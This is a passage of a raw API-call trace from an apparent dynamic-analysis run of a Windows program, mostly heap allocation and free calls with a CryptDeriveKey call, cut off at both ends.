[0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977cf8 | out: hHeap=0x970000) returned 1 [0128.987] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a88 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0128.988] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0128.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0128.993] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0128.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0128.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0128.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0128.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0128.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0128.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0128.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0128.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0128.993] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0128.993] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77908 [0128.993] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77908 | out: hHeap=0x970000) returned 1 [0128.994] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fbc8 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0128.994] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0128.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fbc8 | out: hHeap=0x970000) returned 1 [0128.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50a88 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0128.994] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0128.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0128.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0128.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78bb8 | out: hHeap=0x970000) returned 1 [0128.994] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0128.994] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0128.995] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50b00 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0128.995] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0128.995] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c08 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0128.996] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0128.997] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.997] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540f8 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54eb8 [0128.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0128.998] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50c38 [0128.998] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50c38, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69a28 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e48 [0128.999] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa87110, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87590) returned 1 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b08 [0128.999] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0129.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0129.036] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0129.037] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d28 [0129.037] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d28 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0129.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0129.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0129.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0129.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cf8 | out: hHeap=0x970000) returned 1 [0129.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0129.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ea8 [0129.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0129.038] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50dd0 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ea8 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0129.038] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540f8 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a58 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bf0 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b78 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cb0 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509c8 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c08 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0129.039] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c20 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x9778d8 | out: hHeap=0x970000) returned 1 [0129.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: 